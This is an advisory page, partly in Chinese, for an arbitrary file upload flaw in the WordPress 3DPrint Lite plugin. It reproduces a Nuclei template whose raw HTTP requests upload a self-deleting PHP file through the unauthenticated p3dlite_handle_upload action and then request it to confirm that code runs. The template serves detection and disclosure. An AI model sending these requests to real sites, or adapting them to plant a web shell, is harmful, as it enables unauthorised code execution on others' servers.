3dprint-arbitrary-file-upload: WordPress 3DPrint Lite <1.9.1.5 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: WordPress 3DPrint Lite | POC: 已公开

漏洞描述

WordPress 3DPrint Lite plugin before 1.9.1.5 contains an arbitrary file upload vulnerability. The p3dlite_handle_upload AJAX action of the plugin does not have any authorization and does not check the uploaded file. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: 3dprint-arbitrary-file-upload

info:
  name: WordPress 3DPrint Lite <1.9.1.5 - Arbitrary File Upload
  author: SecTheBit
  severity: high
  description: |
    WordPress 3DPrint Lite plugin before 1.9.1.5 contains an arbitrary file upload vulnerability. The p3dlite_handle_upload AJAX action of the plugin does not have any authorization and does not check the uploaded file. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: Upgrade to 1.9.1.5 or later.
  reference:
    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
    - https://www.exploit-db.com/exploits/50321
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
  tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint

variables:
  string: "3dprint-arbitrary-file-upload"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353

        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="action"

        p3dlite_handle_upload
        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="file"; filename={{randstr}}.php
        Content-Type: text/php

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        -----------------------------54331109111293931601238262353--
      - |
        GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'
# digest: 4a0a0047304502210092014e2acf3401af56c104fd1cc045a38ee62d7793eecc5e0962c429f73fc1f002207e813d9d93e030d662ea9c28e935a97042af0cc1cdbc8374c67d6742cb7a8814:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml